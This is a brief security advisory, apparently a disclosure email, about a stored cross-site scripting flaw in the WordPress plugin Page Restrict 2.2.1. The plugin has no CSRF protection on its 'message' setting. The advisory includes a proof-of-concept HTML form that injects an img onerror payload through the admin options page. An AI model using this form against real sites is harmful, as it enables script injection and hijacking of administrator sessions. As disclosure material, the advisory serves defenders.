Hello,

Plugin: Page Restrict 2.2.1 https://wordpress.org/plugins/pagerestrict/

1. Persistent Cross-Site Scripting (XSS) 

Authenticated administrators can store html/js code in plugin configuration values (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=pagerestrict

Vulnerable parameters: message

Example PHP callstack:

pr_admin_page   [/pagerestrict/inc/admin.php:115]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=pagerestrict" />

<input type="text" name="action" value='update' />

<input type="text" name="message" value='</textarea><img src=x onerror=alert(1) />' />

<input type="submit" name="submit" />

</form>

--